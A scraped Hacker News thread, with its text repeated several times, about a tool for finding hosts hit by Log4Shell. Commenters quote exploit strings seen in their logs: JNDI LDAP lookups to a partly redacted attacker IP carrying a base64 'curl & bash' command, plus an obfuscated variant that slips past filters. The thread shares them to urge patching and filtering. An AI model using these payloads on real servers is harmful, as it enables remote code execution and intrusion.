top | item 29533252 Our new tool for enumerating hidden Log4Shell-affected hosts 22 points| dnet | 4 years ago |blog.silentsignal.eu 3 comments order hn newest elric|4 years ago We've been noticing attempted exploits in the wild. Attempts like these have started appearing in our logs:> /?x=${jndi:ldap://45.155.205.XXX:12344/Basic/Command/Base64/<base64 encoded call to curl & bash>Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this. bArray|4 years ago Can confirm this also: ${jndi:ldap://45.155.205.xxx:12 344/Basic/Command/Base64/<base64>} > Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.Note that the filtering may not work, I am already seeing some variations of mitigation by the attackers: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.xxx:12344/Basic/Command/Base64/<base64> load replies (1)
elric|4 years ago We've been noticing attempted exploits in the wild. Attempts like these have started appearing in our logs:> /?x=${jndi:ldap://45.155.205.XXX:12344/Basic/Command/Base64/<base64 encoded call to curl & bash>Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this. bArray|4 years ago Can confirm this also: ${jndi:ldap://45.155.205.xxx:12 344/Basic/Command/Base64/<base64>} > Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.Note that the filtering may not work, I am already seeing some variations of mitigation by the attackers: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.xxx:12344/Basic/Command/Base64/<base64> load replies (1)
bArray|4 years ago Can confirm this also: ${jndi:ldap://45.155.205.xxx:12 344/Basic/Command/Base64/<base64>} > Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.Note that the filtering may not work, I am already seeing some variations of mitigation by the attackers: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.xxx:12344/Basic/Command/Base64/<base64> load replies (1)
elric|4 years ago
> /?x=${jndi:ldap://45.155.205.XXX:12344/Basic/Command/Base64/<base64 encoded call to curl & bash>
Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.
bArray|4 years ago
Note that the filtering may not work, I am already seeing some variations of mitigation by the attackers: